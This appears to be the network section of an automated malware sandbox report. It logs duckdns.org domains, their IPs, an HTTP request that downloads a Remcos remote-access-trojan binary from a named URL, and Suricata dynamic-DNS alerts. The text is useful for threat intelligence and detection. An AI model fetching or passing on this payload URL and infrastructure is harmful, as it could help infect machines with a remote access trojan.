Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| slx-wave.duckdns.org | 23.146.242.71 | |
| sol-bin.duckdns.org | 23.146.242.85 |
GET
200
http://sol-bin.duckdns.org/Remcos_S_tGNeLX139.bin
REQUEST
RESPONSE
BODY
GET /Remcos_S_tGNeLX139.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: sol-bin.duckdns.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 30 Aug 2021 06:11:00 GMT
Accept-Ranges: bytes
ETag: "17182ace659dd71:0"
Server: Microsoft-IIS/8.5
Date: Mon, 06 Sep 2021 23:39:29 GMT
Content-Length: 469056
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| UDP 192.168.56.102:64995 -> 164.124.101.2:53 | 2022918 | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain | Misc activity |
| UDP 192.168.56.102:52336 -> 164.124.101.2:53 | 2022918 | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain | Misc activity |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts